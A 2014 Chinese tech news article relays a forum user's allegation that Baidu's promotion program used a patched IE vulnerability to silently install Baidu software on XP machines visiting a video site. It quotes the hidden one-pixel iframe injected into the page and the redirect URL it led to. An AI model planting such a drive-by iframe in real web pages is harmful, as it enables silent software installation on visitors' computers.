杀毒软件形同病毒 百度利用IE漏洞流氓推广
2014-12-03 11:16:28   来源：it.hebei.com.cn   评论：0 点击：

　　漏洞是木马病毒入侵的一个主要通道，黑客利用漏洞在网站挂马，一旦有人访问电脑就会自动下载运行病毒。但令人震惊的是，竟有杀毒软件也在利用漏洞偷偷自动装入用户电脑。

　　据专业安全论坛卡饭网友曝光称，自己用XP电脑访问百度影音联盟网站时，电脑自动下载运行了百度杀毒、百度卫士、百度浏览器和百度输入法等一系列百度软件。经过分析，发现这是名为“百度有钱联盟”的安装包在利用IE漏洞植入电脑。

　　

　　名为“雷帝因陀罗”网友表示，今天上网看片，搜到一个影音站，结果片子半天没有缓冲出来，电脑先卡得要死。没过一会儿，突然发现桌面右下角冒出几个图标，不知怎么就装上了百度杀毒、百度卫士之类的。

　　他第一反应就是这个网站有问题，赶紧查了下页面的源代码http://www.80ydw.com/movie/693.html，果然有处很可疑：<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>，明显是被挂马了：

　　他进一步分析，http://hpa.pw/HHH这个页面会跳转到http://221.233.160.110/images/xml.html，懂行的一看都知道了，它就是利用微软11月刚补的IE漏洞挂马(该网友电脑是XP系统直接中招)，挂的竟然是一个百度官方签名的安装包，下载地址也是在百度服务器！

　　

　　再看百度利用IE漏洞偷偷安装的这个安装包，文件名是BaiduYouQianPartPackSilent_1.1.0.10_150946.exe(百度一键装机程序)，大小竟然有144MB！当它利用漏洞自动下载执行后，会给电脑里装上百度杀毒、百度卫士、百度浏览器和百度输入法等一系列软件，难怪电脑都快卡死机了。

　　

　　百度流氓推广使用的漏洞，在11月微软补丁日刚刚得到微软修复。但由于部分网民没有及时打补丁，再加上XP系统停止安全更新，此漏洞仍存在一定风险。

　　正如网友“雷帝因陀罗”所说，互联网公司流氓推广见得多了，但最多就是诱导性的弹窗，而百度所谓的杀毒软件，竟然像病毒一样攻击用户的系统漏洞，真是连底裤都不要了。